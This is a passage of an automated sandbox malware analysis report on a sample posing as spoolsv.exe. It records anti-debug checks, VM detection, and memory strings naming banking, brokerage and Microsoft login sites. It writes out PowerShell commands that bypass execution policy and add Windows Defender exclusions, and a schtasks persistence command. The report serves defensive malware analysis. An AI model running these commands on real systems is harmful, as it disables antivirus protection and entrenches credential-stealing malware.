                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815BEC4 FindFirstFileExA,8_2_00007FFB0815BEC4
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CFC027 FindFirstFileExA,27_2_73CFC027
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599875Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599765Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599656Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599547Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599437Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599328Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599219Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599094Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598984Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598875Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598765Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598656Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598547Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598437Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598326Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598216Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598094Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597984Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597874Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597765Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597656Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597547Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597437Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                            Source: spoolsv.exeBinary or memory string: vmware
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5_dvmci
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                            Source: attzwu.exe, 0000001B.00000002.2707260922.0000000001712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231LR
                            Source: attzwu.exe, 0000001B.00000002.2746554906.00000000045F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                            Source: attzwu.exe, 0000001B.00000002.2746554906.0000000004652000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000386F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB08152554 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFB08152554
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF77A6 mov eax, dword ptr fs:[00000030h]27_2_73CF77A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815CF34 GetProcessHeap,8_2_00007FFB0815CF34
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB08152554 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFB08152554
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB081649B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFB081649B4
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB081585F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFB081585F4
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF8EDD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_73CF8EDD
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF211B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_73CF211B
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF24B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_73CF24B7
                            Source: C:\Users\user\Desktop\spoolsv.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe'
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe'Jump to behavior
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Users\user\AppData\Local\Temp\attzwu.exe "C:\Users\user\AppData\Local\Temp\attzwu.exe" Jump to behavior

                            Language, Device and Operating System Detection

                            barindex
                            Yara detected Telegram Recon
                            Source: Yara matchFile source: spoolsv.exe, type: SAMPLE
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB08164210 cpuid 8_2_00007FFB08164210
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Users\user\Desktop\spoolsv.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
